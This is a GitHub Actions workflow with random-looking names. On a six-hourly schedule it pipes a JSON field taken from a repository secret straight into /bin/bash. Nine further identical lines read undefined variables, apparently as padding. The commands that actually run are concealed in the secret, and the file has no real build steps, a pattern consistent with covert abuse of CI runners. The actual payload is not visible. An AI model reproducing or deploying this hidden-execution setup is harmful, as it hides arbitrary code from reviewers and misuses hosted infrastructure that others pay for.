name: jinxinnian3421

on:
  workflow_dispatch:
  schedule:
    - cron: '21 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jinxinnian3421
        env:
          rgam2: ${{ secrets.rgam2 }}
        run: |
          echo $rgam2 | jq -r .cdws15528 | /bin/bash
          echo $eibt8904 | jq -r .khiy1229 | /bin/bash
          echo $duxys75 | jq -r .hvqtv50 | /bin/bash
          echo $zx81 | jq -r .o03 | /bin/bash
          echo $kqxv9956 | jq -r .kg48 | /bin/bash
          echo $vnmd11546 | jq -r .bisf533 | /bin/bash
          echo $dsues3461 | jq -r .yfg46 | /bin/bash
          echo $gofqq55765 | jq -r .g6129 | /bin/bash
          echo $juzq00 | jq -r .kpsdc18 | /bin/bash
          echo $qi194 | jq -r .rvsyl51 | /bin/bash

